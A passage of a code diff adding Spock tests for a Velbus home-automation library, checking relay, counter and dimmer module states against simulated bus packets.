+    Object relayChannel1State
+    network.addPropertyValueConsumer(81, "CH1", { newValue ->
+      relayChannel1State = newValue
+    })
+    VelbusDevice device = network.getDevice(81)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB1RYNO
+      assert device.getBaseAddress() == 81
+    }
+
+    and: "the relay property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH5") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH5_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("CH1_LOCKED")
+      assert !device.getPropertyValue("CH2_LOCKED")
+      assert !device.getPropertyValue("CH3_LOCKED")
+      assert !device.getPropertyValue("CH4_LOCKED")
+      assert !device.getPropertyValue("CH5_LOCKED")
+      assert !device.getPropertyValue("CH1_INHIBITED")
+      assert !device.getPropertyValue("CH2_INHIBITED")
+      assert !device.getPropertyValue("CH3_INHIBITED")
+      assert !device.getPropertyValue("CH4_INHIBITED")
+      assert !device.getPropertyValue("CH5_INHIBITED")
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH5_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is switched on"
+    device.writeProperty("CH4", true)
+
+    then: "a relay should be on"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is switched off"
+    device.writeProperty("CH4", false)
+
+    then: "a relay should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is set to intermittent"
+    device.writeProperty("CH1", RelayProcessor.ChannelState.INTERMITTENT.name())
+
+    then: "the relay should be in intermittent mode"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.INTERMITTENT
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    when: "the relay is switched off again"
+    device.writeProperty("CH1", false)
+
+    then: "the relay should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is set to intermittent for 1s"
+    device.writeProperty("CH2_INTERMITTENT", 1d)
+
+    then: "the relay should be in intermittent state"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.INTERMITTENT
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    and: "the relay should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is set to intermittent indefinitely"
+    device.writeProperty("CH2_INTERMITTENT", -1d)
+
+    then: "the relay should be in intermittent state"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.INTERMITTENT
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    when: "the relay intermittent state is cancelled"
+    device.writeProperty("CH2_INTERMITTENT", 0d)
+
+    then: "the relay should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is inhibited for 1s"
+    device.writeProperty("CH2_INHIBIT", 1d)
+
+    then: "the relay should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
+    }
+
+    and: "the relay should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is inhibited indefinitely"
+    device.writeProperty("CH2_INHIBIT", -1d)
+
+    then: "the relay should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
+    }
+
+    when: "the relay inhibit is cancelled"
+    device.writeProperty("CH2_INHIBIT", 0d)
+
+    then: "the relay should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is forced on for 1s"
+    device.writeProperty("CH3_FORCE_ON", 1d)
+
+    then: "a relay should be on"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.FORCED
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
+    }
+
+    and: "the relay should switch off again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 04 00 00 00 00 00 00 9E 04"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 02 F5 02 CD 04 00 00 00 00 00 00"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is locked for 1s"
+    device.writeProperty("CH1_LOCK", 1d)
+
+    then: "the relay should be off and disabled (forced off)"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+      assert device.getPropertyValue("CH1_LOCKED")
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    and: "the relay should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is switched on for 1s"
+    device.writeProperty("CH1_ON", 1d)
+
+    then: "the relay should be on and in normal state"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    and: "the relay should return to off"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 51 04 00 00 01 00 A3 04 00 00 00 00"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is switched on indefinitely"
+    device.writeProperty("CH1_ON", -1d)
+
+    then: "the relay should be on and in normal state"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.ON
+    }
+
+    when: "we cancel the on timer"
+    device.writeProperty("CH1_ON", 0d)
+
+    then: "the relay should return to off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a relay is locked for 1s"
+    device.writeProperty("CH2_LOCK", 1d)
+
+    then: "the relay should be disabled"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+    }
+
+    and: "the relay should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a relay is locked indefinitely"
+    device.writeProperty("CH2_LOCK", -1d)
+
+    then: "the relay should be locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+    }
+
+    when: "the relay lock is cancelled"
+    device.writeProperty("CH2_LOCK", 0d)
+
+    then: "the relay should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    cleanup: "put the device state back"
+    if (device != null) {
+      device.writeProperty("CH1", false)
+      device.writeProperty("CH2", false)
+      device.writeProperty("CH3", false)
+      device.writeProperty("CH4", false)
+      device.writeProperty("CH5", false)
+    }
+  }
+
+  def "Counter Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 10 (VMB7IN)"
+    Object vmb7InCounter1
+    network.addPropertyValueConsumer(10, "COUNTER1", { newValue ->
+      vmb7InCounter1 = newValue
+    })
+    VelbusDevice device = network.getDevice(10)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB7IN
+      assert device.getBaseAddress() == 10
+    }
+
+    and: "the counter property values should be initialised"
+    conditions.eventually {
+      1.upto(4, {
+        if (it == 1) {
+          assert device.getPropertyValue("COUNTER" + it + "_ENABLED")
+          assert device.getPropertyValue("COUNTER" + it) == 0d
+          assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 0.02
+          assert device.getPropertyValue("COUNTER" + it + "_UNITS") == CounterProcessor.CounterUnits.LITRES
+        } else if (it == 2) {
+          assert device.getPropertyValue("COUNTER" + it + "_ENABLED")
+          assert device.getPropertyValue("COUNTER" + it) == 0d
+          assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 140d
+          assert device.getPropertyValue("COUNTER" + it + "_UNITS") == CounterProcessor.CounterUnits.KILOWATTS
+        } else {
+          assert !device.getPropertyValue("COUNTER" + it + "_ENABLED")
+          assert device.getPropertyValue("COUNTER" + it) == 0d
+          assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 0d
+          assert device.getPropertyValue("COUNTER" + it + "_UNITS") == null
+        }
+      })
+    }
+
+    when: "the counter updates on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F FB 0A 08 BE 68 00 00 00 71 23 46 E4 04"))
+
+    then: "the counter should update to match"
+    conditions.eventually {
+      assert device.getPropertyValue("COUNTER1") == 0.04
+      assert device.getPropertyValue("COUNTER1_INSTANT") == 0.15
+    }
+
+    when: "the counter is reset"
+    device.writeProperty("COUNTER1_RESET", AttributeExecuteStatus.REQUEST_START)
+
+    then: "the counter should update to match"
+    conditions.eventually {
+      assert device.getPropertyValue("COUNTER1") == 0d
+      assert device.getPropertyValue("COUNTER1_INSTANT") == 0.02
+    }
+  }
+
+  // TODO: Add tests for VMB4AN once protocol doc is finished
+  def "Analog Output Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 187 (VMB4DC)"
+    Object output1State
+    network.addPropertyValueConsumer(2, "OUTPUT1", { newValue ->
+      output1State = newValue
+    })
+    VelbusDevice device = network.getDevice(2)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB4AN
+      assert device.getBaseAddress() == 2
+    }
+
+    and: "the IO module property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("OUTPUT1") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("OUTPUT2") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("OUTPUT3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("OUTPUT1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("OUTPUT2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("OUTPUT3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("OUTPUT1_LOCKED")
+      assert !device.getPropertyValue("OUTPUT2_LOCKED")
+      assert !device.getPropertyValue("OUTPUT3_LOCKED")
+      assert !device.getPropertyValue("OUTPUT4_LOCKED")
+      assert !device.getPropertyValue("OUTPUT1_INHIBITED")
+      assert !device.getPropertyValue("OUTPUT2_INHIBITED")
+      assert !device.getPropertyValue("OUTPUT3_INHIBITED")
+      assert !device.getPropertyValue("OUTPUT4_INHIBITED")
+      assert device.getPropertyValue("OUTPUT1_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("OUTPUT2_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("OUTPUT3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("OUTPUT1_VALUE") == 0d
+      assert device.getPropertyValue("OUTPUT2_VALUE") == 0d
+      assert device.getPropertyValue("OUTPUT3_VALUE") == 0d
+      assert device.getPropertyValue("OUTPUT4_VALUE") == 0d
+    }
+
+    //        when: "an output channel is switched on"
+    //        device.writeProperty("OUTPUT4", true)
+    //
+    //        then: "the output should be on 100%"
+    //        conditions.eventually {
+    //            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
+    //            assert device.getPropertyValue("OUTPUT4_VALUE") == 3839
+    //            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    //            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
+    //        }
+    //
+    //        when: "the output is switched off"
+    //        device.writeProperty("OUTPUT4", false)
+    //
+    //        then: "the output should be off"
+    //        conditions.eventually {
+    //            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
+    //            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    //            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
+    //        }
+    //
+    //        when: "a output channel is set to 50%"
+    //        device.writeProperty("OUTPUT4_LEVEL", 50d)
+    //
+    //        then: "the output should be on 5V"
+    //        conditions.eventually {
+    //            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
+    //            assert device.getPropertyValue("OUTPUT4_VALUE") == 50000
+    //            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    //            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.ON
+    //        }
+    //
+    //        when: "the output is switched off"
+    //        device.writeProperty("OUTPUT4", false)
+    //
+    //        then: "the output should be off"
+    //        conditions.eventually {
+    //            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
+    //            assert device.getPropertyValue("OUTPUT4_VALUE") == 0
+    //            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    //            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
+    //        }
+    //
+    //        when: "a output channel is set to last"
+    //        device.writeProperty("OUTPUT4", AnalogOutputProcessor.ChannelState.LAST.objectToValue(STRING))
+    //
+    //        then: "the output should go to 5V"
+    //        conditions.eventually {
+    //            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
+    //            assert device.getPropertyValue("OUTPUT4_VALUE") == 50000
+    //            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    //            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.ON
+    //        }
+
+
+    when: "A device property value consumer is registered for device address 187 (VMB4DC)"
+    Object dimmerChannel1State
+    network.addPropertyValueConsumer(187, "CH1", { newValue ->
+      dimmerChannel1State = newValue
+    })
+    device = network.getDevice(187)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB4DC
+      assert device.getBaseAddress() == 187
+    }
+
+    and: "the dimmer property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("CH1_LOCKED")
+      assert !device.getPropertyValue("CH2_LOCKED")
+      assert !device.getPropertyValue("CH3_LOCKED")
+      assert !device.getPropertyValue("CH4_LOCKED")
+      assert !device.getPropertyValue("CH1_INHIBITED")
+      assert !device.getPropertyValue("CH2_INHIBITED")
+      assert !device.getPropertyValue("CH3_INHIBITED")
+      assert !device.getPropertyValue("CH4_INHIBITED")
+      assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH1_LEVEL") == 0d
+      assert device.getPropertyValue("CH2_LEVEL") == 0d
+      assert device.getPropertyValue("CH3_LEVEL") == 0d
+      assert device.getPropertyValue("CH4_LEVEL") == 0d
+    }
+
+    when: "a dimmer channel is switched on"
+    device.writeProperty("CH4", true)
+
+    then: "the dimmer should be on 100%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH4_LEVEL") == 100d
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
+    }
+
+    when: "the dimmer is switched off"
+    device.writeProperty("CH4", false)
+
+    then: "the dimmer should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer channel is set to 50%"
+    device.writeProperty("CH4_LEVEL", 50d)
+
+    then: "the dimmer should be on 50%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH4_LEVEL") == 50d
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
+    }
+
+    when: "the dimmer is switched off"
+    device.writeProperty("CH4", false)
+
+    then: "the dimmer should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4_LEVEL") == 0d
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer channel is set to last"
+    device.writeProperty("CH4", AnalogOutputProcessor.ChannelState.LAST.name())
+
+    then: "the dimer should go to 50%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH4_LEVEL") == 50d
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
+    }
+
+    when: "the dimmer is switched off again"
+    device.writeProperty("CH4", false)
+
+    then: "the dimmer should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH4_LEVEL") == 0d
+      assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer is set to 75% over 7s"
+    device.writeProperty("CH2_LEVEL_AND_SPEED", "75:7")
+
+    then: "the dimmer should reach 75% after 7s"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.ON
+      assert device.getPropertyValue("CH2_LEVEL") == 75d
+    }
+
+    when: "the dimmer is switched off again"
+    device.writeProperty("CH2", false)
+
+    then: "the dimmer should be off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_LEVEL") == 0d
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer is switched on for 3s"
+    device.writeProperty("CH2_ON", 3)
+
+    then: "the dimmer should switch on"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    and: "eventually the message queue should become empty"
+    conditions.eventually {
+      assert network.messageQueue.size() == 0
+    }
+
+    then: "the dimmer should switch off again"
+    if (network.client == messageProcessor) {
+      messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 BB 04 00 00 02 00 38 04 00 00 00 00"))
+      messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 02 00 00 00 00 00 00 79 04"))
+    }
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH2_LEVEL") == 0d
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer is set to 50% over 60s"
+    device.writeProperty("CH2_LEVEL_AND_SPEED", "50:60")
+
+    then: "the dimmer should start ramping up"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
+    }
+
+    when: "we cancel the current dimming operation"
+    device.writeProperty("CH2_LEVEL", -1d)
+
+    then: "the dimmer level should be somewhere between 0-50% and be on"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.ON
+      def dimLevel = device.getPropertyValue("CH2_LEVEL")
+      assert dimLevel> 0 && dimLevel < 50
+    }
+
+    when: "a dimmer is inhibited for 1s"
+    device.writeProperty("CH3_INHIBIT", 1d)
+
+    then: "the dimmer should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
+    }
+
+    and: "the dimmer should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a dimmer is inhibited indefinitely"
+    device.writeProperty("CH3_INHIBIT", -1d)
+
+    then: "the dimmer should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
+    }
+
+    when: "the dimmer inhibit is cancelled"
+    device.writeProperty("CH3_INHIBIT", 0d)
+
+    then: "the dimmer should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a dimmer is forced on for 5s"
+    device.writeProperty("CH3_FORCE_ON", 5d)
+
+    then: "the dimmer should be on"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.FORCED
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
+      assert device.getPropertyValue("CH3_LEVEL") == 100
+    }
+
+    and: "the dimmer should switch off again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 BB 04 00 00 04 00 36 04 00 00 00 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
+
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
